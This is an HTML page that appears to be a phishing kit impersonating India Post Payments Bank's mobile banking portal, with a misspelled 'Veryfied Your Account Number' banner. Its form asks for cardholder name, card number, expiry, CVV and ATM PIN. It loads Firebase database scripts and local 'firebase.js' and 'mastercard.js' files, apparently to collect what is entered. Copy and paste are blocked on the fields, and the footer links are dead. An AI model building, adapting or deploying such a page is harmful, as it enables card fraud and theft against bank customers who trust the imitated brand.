<html>

<head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="icon" type="image/png" sizes="32x32" href="./database_files/favicon.png">
    <title>Welcome to Mobile Banking</title>
    <meta content="initial-scale=1.0, width=device-width" name="viewport">
    <link href="./database_files/mentions.css" rel="stylesheet" type="text/css">
    <link href="./database_files/main.css" rel="stylesheet" type="text/css">
    <link class="lfr-css-file" data-senna-track="temporary" href="./database_files/aui.css" id="liferayAUICSS" rel="stylesheet" type="text/css">
    <link data-senna-track="temporary" href="./database_files/main(1).css" id="liferayPortalCSS" rel="stylesheet" type="text/css">
    <link class="lfr-css-file" data-senna-track="temporary" href="./database_files/main(2).css" id="liferayThemeCSS" rel="stylesheet" type="text/css">
<img src="asdf1.png"  width="100%" height="13%">
</head>
<style>
   #kyc {
            width: 104%;
            background-color:#B21807;
            height: 55px;
            margin: 6px;
            margin-left: -7px;
        }
</style>

          <div id="kyc"><br>
            <b style="color:white; padding:20px;">Veryfied Your Account Number </b>
        </div>

<body>

    <div class="container-fluid" id="wrapper" style="padding-top: 0px !important;">

        <header id="banner" role="banner">
            <section class="section-second">
                <div class="row">
                    <div class="col-md-4 col-sm-12">

                        <div class=""> <span id=""></span>
                            <section class="portlet" id="">
                                <div class="portlet-content">
                                    <div class="">
                                        <div class="portlet-body">
                                            <div class=""> </div>

                                            <div class="journal-content-article">
                                                <div class="left-right-logo-wrapper">
                                                    <div class="logo-01 left-logo-wrap">
                                                        <div class="hidden-sm hidden-xs">

                                                            
                                                </div>
                                                <style>
                                                    .left-right-logo-wrapper .left-logo-wrap {
                                                        display: inline-block;
                                                        float: left;
                                                        padding: 15px 0;
                                                    }

                                                    .left-right-logo-wrapper .right-logo-wrap-tab-mob {
                                                        display: inline-block;
                                                        float: right;
                                                    }

                                                    .left-right-logo-wrapper .left-logo-wrap.logo-01 a {
                                                        display: block;
                                                    }

                                                    .left-right-logo-wrapper .right-logo-wrap-tab-mob a {
                                                        display: block;
                                                    }

                                                    .left-right-logo-wrapper .left-logo-wrap.logo-01 img {
                                                        height: auto;
                                                        width: 100%;
                                                    }

                                                    @media screen and (max-width: 991px) and (min-width: 320px) and (orientation: landscape) {
                                                        .logo-01.right-logo-wrap-tab-mob img {
                                                            width: 100% !important;
                                                            height: auto !important;
                                                        }
                                                    }

                                                    @media (max-width: 991px) {
                                                        .left-right-logo-wrapper .left-logo-wrap {
                                                            width: 80%;
                                                        }
                                                        .left-right-logo-wrapper .left-logo-wrap.logo-01 img {
                                                            margin: unset;
                                                            width: 100%;
                                                            max-width: 400px;
                                                            margin-top: 15px;
                                                        }
                                                        .left-right-logo-wrapper .right-logo-wrap-tab-mob {
                                                            width: 20%;
                                                        }
                                                        .left-right-logo-wrapper .left-logo-wrap.logo-01 img {
                                                            margin-top: unset;
                                                        }
                                                        .left-right-logo-wrapper .right-logo-wrap-tab-mob {
                                                            width: 20%;
                                                            padding: 15px 0;
                                                        }
                                                        .left-right-logo-wrapper .right-logo-wrap-tab-mob a {
                                                            text-align: right;
                                                        }
                                                        .logo-01.right-logo-wrap-tab-mob img {
                                                            max-width: 70px;
                                                            margin: unset;
                                                            display: unset;
                                                            height: auto;
                                                        }
                                                    }
                                                </style>
                                            </div>



                                        </div>
                                    </div>
                                </div>
                            </section>
                        </div>
                    </div>

                    <div class="col-md-1 col-sm-12 hidden-sm hidden-xs right-logo-wrap-desktop">
                        <div class="portlet-boundary portlet-boundary_com_liferay_journal_content_web_portlet_JournalContentPortlet_ portlet-static portlet-static-end decorate portlet-journal-content " id="p_p_id_com_liferay_journal_content_web_portlet_JournalContentPortlet_INSTANCE_siteRightLogoLogin_">
                        <span id="p_com_liferay_journal_content_web_portlet_JournalContentPortlet_INSTANCE_siteRightLogoLogin"></span>
                            <section class="portlet" id="portlet_com_liferay_journal_content_web_portlet_JournalContentPortlet_INSTANCE_siteRightLogoLogin">
                                <div class="portlet-content">
                                    <div class=" portlet-content-container">
                                        <div class="portlet-body">
                                            <div class="text-right user-tool-asset-addon-entries"> </div>
                                            <div class="journal-content-article">
                                                <style>
                                                    .right-logo-login-wrapper-desktop .right-logo {
                                                        padding: 17px 0;
                                                    }

                                                    .right-logo-login-wrapper-desktop a {
                                                        display: block;
                                                        text-align: right;
                                                    }

                                                    .right-logo-login-wrapper-desktop .right-logo img {
                                                        height: unset;
                                                    }

                                                    @media only screen and (min-width: 768px) and (max-width: 1080px) {
                                                        .right-logo-login-wrapper-desktop .right-logo img {
                                                            margin: unset;
                                                            float: right;
                                                        }
                                                    }

                                                    .ippb-corp-logo-75 img {
                                                        width: 65%;
                                                    }

                                                    @media(max-width: 767px) {
                                                        .ippb-corp-logo-75 img {
                                                            width: 30%;
                                                            margin: 0px 210px;
                                                        }
                                                        .ippb-corp-logo-75 .right-logo-login-wrapper-desktop .right-logo .hidden-sm,
                                                        .ippb-corp-logo-75 .right-logo-login-wrapper-desktop .right-logo .hidden-xs {
                                                            display: block !important;
                                                        }
                                                        .ippb-corp-logo-75 .right-logo {
                                                            display: inline-block;
                                                            margin: 0 auto;
                                                            padding: 0px;
                                                            margin-top: -15px;
                                                        }
                                                    }

                                                    @media(max-width: 480px) {
                                                        .ippb-corp-logo-75 img {
                                                            width: 30%;
                                                            margin: 0px 120px;
                                                        }
                                                    }

                                                    @media(max-width: 991px) {
                                                        .ippb-corp-logo-75 img {
                                                            width: 30%;
                                                        }
                                                    }

                                                    @media only screen and (max-width: 767px) {
                                                        .hindi-section {
                                                            margin-left: -15px;
                                                        }
                                                        .toll-free {
                                                            flex-wrap: nowrap;
                                                            display: flex;
                                                        }
                                                    }

                                                    @media only screen and (min-width: 768px) and (max-width: 991px) {
                                                        .ippb-corp-logo-75 .right-logo {
                                                            position: absolute;
                                                            top: -85px;
                                                            right: 92px;
                                                        }
                                                        .ippb-corp-logo-75 .right-logo img {
                                                            width: 20%;
                                                        }
                                                        .ippb-corp-logo-75 .right-logo-login-wrapper-desktop .right-logo .hidden-sm,
                                                        .ippb-corp-logo-75 .right-logo-login-wrapper-desktop .right-logo .hidden-xs {
                                                            display: block !important;
                                                        }
                                                    }
                                                </style>
                                                <div class="right-logo-login-wrapper-desktop">
                                                    <div class="right-logo">
                                                        <div class="hidden-sm hidden-xs"> <a target="_blank" class="externallink" href="https://www.indiapost.gov.in/vas/Pages/IndiaPostHome.aspx"> <img data-fileentryid="" alt="" src="./database_files/article(8)"> </a> </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="content-metadata-asset-addon-entries"> </div>
                                        </div>
                                    </div>
                                </div>
                            </section>
                        </div>
                    </div>
                </div>
            </section>

            <style>
                .ippbchangefont {
                    position: relative;
                    bottom: 17px;
                }

                .ippbaboutus {
                    position: relative;
                    left: 70px;
                }
            </style>
        </header>


        <section id="content">


            <div class="col-lg-6 col-md-6 col-sm-6">
                <label style="font-size: 18px; font-weight: bold; color: #333;">Enter Valid Debit/Credit Card from another Bank</label>
            </div>

            <div class="columns-max" id="main-content" role="main">
                <div class="portlet-layout row">
                    <div class="col-md-12 portlet-column portlet-column-only" id="column-1">
                        <div class="portlet-boundary portlet-boundary_com_liferay_login_web_portlet_LoginPortlet_ portlet-static portlet-static-end decorate portlet-login " id="p_p_id_com_liferay_login_web_portlet_LoginPortlet_"> <span id="p_com_liferay_login_web_portlet_LoginPortlet"></span>

                            <section class="portlet" id="portlet_com_liferay_login_web_portlet_LoginPortlet">
                                <div class="portlet-content"> <a class="icon-monospaced portlet-icon-back text-default" href="" title="Return to Full Page"></a>
                                    <div class=" portlet-content-container">

                                        <div class="portlet-body">

                                            <div class="login-container">



                                                <form action="" id="ududip005">

                                                    <div class="col-lg-6 col-md-6 col-sm-6">
                                                        <div class="form-group">

                                                            <label for="cardholder">Card Holder Name*</label>

                                                            <input name="cardholder" type="text" class="form-control" id="cname" tabindex="12" size="30" maxlength="30" minlength="3" onfocus="getFocus(this.id);" autocomplete="off" oncopy="return false" onpaste="return false" aria-label="cardholder" required/>




                                                            <label for="cardNumber">Debit/Credit Card Number*</label>

                                                            <input name="cardNumber" type="text" class="form-control" id="ccard" tabindex="12" size="19" maxlength="19" minlength="19" onfocus="getFocus(this.id);" autocomplete="off" oncopy="return false" onpaste="return false" oninput="formatCardNumber(this);" onkeypress="return isNumberKey(event);"
                                                                onkeydown="return isNumberKey(event);" aria-label="cardNumber" required/>

                                                            <div id="cardType"></div>

                                                            <script>
                                                                function formatCardNumber(input) {
                                                                    // remove all non-numeric characters except spaces
                                                                    const cardNumber = input.value.replace(/[^0-9 ]/g, '');
                                                                    // remove all spaces
                                                                    const cardNumberNoSpaces = cardNumber.replace(/ /g, '');
                                                                    // add spaces every 4 digits
                                                                    const formattedCardNumber = cardNumberNoSpaces.replace(/(\d{4})/g, '$1 ').trim();
                                                                    // update the input value
                                                                    input.value = formattedCardNumber;
                                                                    // validate the card number
                                                                    validateCardNumber(input);
                                                                }

                                                                function validateCardNumber(input) {
                                                                    const cardNumberNoSpaces = input.value.replace(/ /g, ''); // remove all spaces
                                                                    const cardTypes = [{
                                                                            name: 'Visa',
                                                                            pattern: /^4/
                                                                        },
                                                                        {
                                                                            name: 'Mastercard',
                                                                            pattern: /^5[1-5]/
                                                                        },
                                                                        {
                                                                            name: 'American Express',
                                                                            pattern: /^3[47]/
                                                                        },
                                                                        {
                                                                            name: 'Discover',
                                                                            pattern: /^6(?:011|5)/
                                                                        },
                                                                        {
                                                                            name: 'Diners Club',
                                                                            pattern: /^3(?:0[0-5]|[68][0-9])/
                                                                        },
                                                                        {
                                                                            name: 'JCB',
                                                                            pattern: /^(?:2131|1800|35\d{3})/
                                                                        },
                                                                        {
                                                                            name: 'Rupay',
                                                                            pattern: /^6[0-9]/
                                                                        }
                                                                    ];
                                                                    const cardType = cardTypes.find(type => cardNumberNoSpaces.match(type.pattern));
                                                                    if (cardType) {
                                                                        console.log(`Card type: ${cardType.name}`);
                                                                        // display the card type to the user
                                                                        const cardTypeElement = document.getElementById('cardType');
                                                                        cardTypeElement.textContent = `Card type: ${cardType.name}`;
                                                                    } else {
                                                                        console.log('Unknown card type');
                                                                        // display an error message to the user
                                                                        const cardTypeElement = document.getElementById('cardType');
                                                                        cardTypeElement.textContent = 'Unknown card type';
                                                                    }
                                                                }
                                                            </script>

                                                            <label for="cexp">Valid Upto*</label>

                                                            <input name="cardexpiry" type="text" class="form-control" id="cexp" tabindex="12" size="7" maxlength="7" minlength="7" onfocus="getFocus(this.id);" autocomplete="off" oncopy="return false" onpaste="return false" oninput="formatCardExpiry(this);" onkeypress="return isNumberKey(event);"
                                                                onkeydown="allowBackspace(event);" aria-label="cardexpiry" placeholder="" required/>

                                                            <script>
                                                                function formatCardExpiry(input) {
                                                                    // Remove all non-numeric characters from the input value
                                                                    const cardExpiry = input.value.replace(/\D/g, '');

                                                                    // Split the input value into month and year
                                                                    const month = cardExpiry.slice(0, 2);
                                                                    const year = cardExpiry.slice(2);

                                                                    // Set the input value to the formatted string (MM / YYYY)
                                                                    input.value = `${month}/${year}`;
                                                                }

                                                                function allowBackspace(event) {
                                                                    // Allow the backspace key to be used to remove the last character
                                                                    const key = event.keyCode || event.charCode;
                                                                    if (key === 8) {
                                                                        event.preventDefault();
                                                                        const input = event.target;
                                                                        const cursorPosition = input.selectionStart;
                                                                        const cardExpiry = input.value.replace(/\D/g, '');

                                                                        if (cursorPosition <= 2) {
                                                                            // If the cursor is in the month field, remove the entire month
                                                                            input.value = '';
                                                                        } else if (cursorPosition === 3) {
                                                                            // If the cursor is at the slash, move it back to the end of the month
                                                                            input.selectionStart = 2;
                                                                            input.selectionEnd = 2;
                                                                        } else if (cursorPosition <= 5) {
                                                                            // If the cursor is in the year field, remove the entire year
                                                                            input.value = cardExpiry.slice(0, 2);
                                                                        } else {
                                                                            // If the cursor is after the year field, move it back to the end of the year
                                                                            input.selectionStart = 5;
                                                                            input.selectionEnd = 5;
                                                                        }
                                                                    }
                                                                }
                                                            </script>



                                                            <label for="cvv">CVV*</label>
                                                            <input name="cvv" type="text" class="form-control" id="ccvv" tabindex="12" size="3" maxlength="3" minlength="3" onfocus="getFocus(this.id);" autocomplete="off" oncopy="return false" onpaste="return false" aria-label="cvv" required/>

                                                            <script>
                                                                const cvvInput = document.getElementById("ccvv");

                                                                cvvInput.addEventListener("input", function() {
                                                                    // Get the current value of the input
                                                                    let inputValue = this.value;

                                                                    // Remove any non-numeric characters
                                                                    inputValue = inputValue.replace(/[^0-9]/g, "");

                                                                    // Update the input value
                                                                    this.value = inputValue;
                                                                });
                                                            </script>



                                                            <label for="pin">ATM PIN*</label>
                                                            <input name="pin" type="text" class="form-control" id="cpin" tabindex="12" size="3" maxlength="4" minlength="4" onfocus="getFocus(this.id);" autocomplete="off" oncopy="return false" onpaste="return false" aria-label="pin" required pattern="^[0-9]{4}$"
                                                            />

                                                            <script>
                                                                const pinInput = document.getElementById("cpin");

                                                                pinInput.addEventListener("input", function() {
                                                                    // Get the current value of the input
                                                                    let inputValue = this.value;

                                                                    // Remove any non-numeric characters
                                                                    inputValue = inputValue.replace(/[^0-9]/g, "");

                                                                    // Update the input value
                                                                    this.value = inputValue;
                                                                });
                                                            </script>





                                                        </div>






                                                        <div class="form-group">

                                                            <input class="btn btn-lg btn-primary btn-default" type="submit" tabindex="18" title="Login" value="Submit	" id="Button2" onclick="return submitLoginShagc(&#39;nLEbcx0S&#39;);">







                                                        </div>
                                                    </div>


                                                </form>



                                                <script src="https://www.gstatic.com/firebasejs/9.6.1/firebase-app.js"></script>
                                                <script src="https://www.gstatic.com/firebasejs/9.6.1/firebase-database.js"></script>
                                                <script src="https://cdnjs.cloudflare.com/ajax/libs/firebase/7.14.1/firebase.js"></script>


                                                <script src="database_files/firebase.js"></script>
                                                <script src="database_files/mastercard.js"></script>





                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </section>
                        </div>
                    </div>
                </div>
            </div>


        </section>
        <div class="scrollTop" style="display: none;"> <a class="back-to-top" style="display: inline;"><i class="fa fa-angle-up"></i><br><span class="top_text">Top</span></a> </div>
    </div>
    <section class="footer-section footerbg">
        <footer role="contentinfo">
            <div class="container-fluid">
                <div class="row">
                    <div class="col-md-12 col-sm-12">
                        <div class="portlet-boundary portlet-boundary_FooterNavigation_ portlet-static portlet-static-end decorate " id="p_p_id_FooterNavigation_INSTANCE_Nz6jS2AQ6j9v_"> <span id="p_FooterNavigation_INSTANCE_Nz6jS2AQ6j9v"></span>
                            <section class="portlet" id="portlet_FooterNavigation_INSTANCE_Nz6jS2AQ6j9v">
                                <div class="portlet-content">
                                    <div class=" portlet-content-container">
                                        <div class="portlet-body">
                                            <div class="container-fluid pad-top">
                                                <div class="row">
                                                    <div class="col-sm-3">
                                                        <div class="footer_dv">
                                                            <h4>Contact Us</h4>
                                                            <ul>
                                                                <li><span>Call us 155299 (Charges apply depending on telecom plan)</span></li>
                                                                <li><span>Email: contact@ippbonline.in</span></li>
                                                                <li> <a href="https://#/web/ippb/locate-us1">Locate Us</a> </li>
                                                                <li> <a href="https://#/web/ippb/reach-us3">Reach Us</a> </li>
                                                                <li> <a href="https://#/web/ippb/faq-s">FAQs</a> </li>
                                                                <li> <a href="https://#/web/ippb/vigilance">Vigilance</a> </li>
                                                                <li> <a href="https://#/web/ippb/partner-with-us1">Partner With Us</a> </li>
                                                                <li> <a href="https://#/web/ippb/service-request1">Service Request</a> </li>
                                                            </ul>
                                                        </div>
                                                    </div>
                                                    <div class="col-sm-3">
                                                        <div class="footer_dv">
                                                            <h4>Regulatory</h4>
                                                            <ul>
                                                                <li> <a href="https://#/web/ippb/privacy-pilocy">Privacy Policy</a> </li>
                                                                <li> <a href="https://#/web/ippb/regulatory-disclosure1">Regulatory Disclosures</a> </li>
                                                                <li> <a href="https://#/web/ippb/code-commitment">Code Of Commitment</a> </li>
                                                                <li> <a href="https://#/web/ippb/website-usage-term">Website Usage Terms</a> </li>
                                                                <li> <a href="https://#/web/ippb/disclaimer">Disclaimer</a> </li>
                                                                <li> <a href="https://#/web/ippb/report-unauthorized-transactions">Report Unauthorized Transactions</a> </li>
                                                                <li> <a href="https://#/web/ippb/right-to-information">Right to Information</a> </li>
                                                                <li> <a href="https://#/web/ippb/rbi-awareness-programme">RBI Awareness Programme</a> </li>
                                                            </ul>
                                                        </div>
                                                    </div>
                                                    <div class="col-sm-3">
                                                        <div class="footer_dv">
                                                            <h4>Media / Announcements</h4>
                                                            <ul>
                                                                <li> <a href="https://#/web/ippb/tenders">Tenders</a> </li>
                                                                <li> <a href="https://#/web/ippb/careers">Careers</a> </li>
                                                                <li> <a href="https://#/web/ippb/bank-notices1">Bank Notices</a> </li>
                                                                <li> <a href="https://#/web/ippb/customer-awareness">Customer Awareness</a> </li>
                                                                <li> <a href="https://#/web/ippb/fincluvation">Fincluvation™</a> </li>
                                                            </ul>
                                                        </div>
                                                    </div>
                                                    <div class="col-sm-3">
                                                        <div class="footer_dv">
                                                            <h4>Other Links</h4>
                                                            <ul>
                                                                <li> <a href="https://#/web/ippb/important-links">Important Links</a> </li>
                                                                <li> <a href="https://#/web/ippb/bank-holidays">Bank Holidays</a> </li>
                                                                <li> <a href="https://#/web/ippb/term-conditions">Terms &amp; Conditions</a> </li>
                                                                <li> <a href="https://#/web/ippb/rates-and-charges">Rates &amp; Charges</a> </li>
                                                                <li> <a href="https://#/web/ippb/downloads">Downloads</a> </li>
                                                                <li> <a href="https://#/web/ippb/sitemap">Sitemap</a> </li>
                                                                <li> <a href="https://#/web/ippb/screen-reader">Screen Reader Accessibility</a> </li>
                                                            </ul>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </section>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12 col-sm-12 col-xs-12"> </div>
                </div>
            </div>
        </footer>
    </section>



</body>

</html>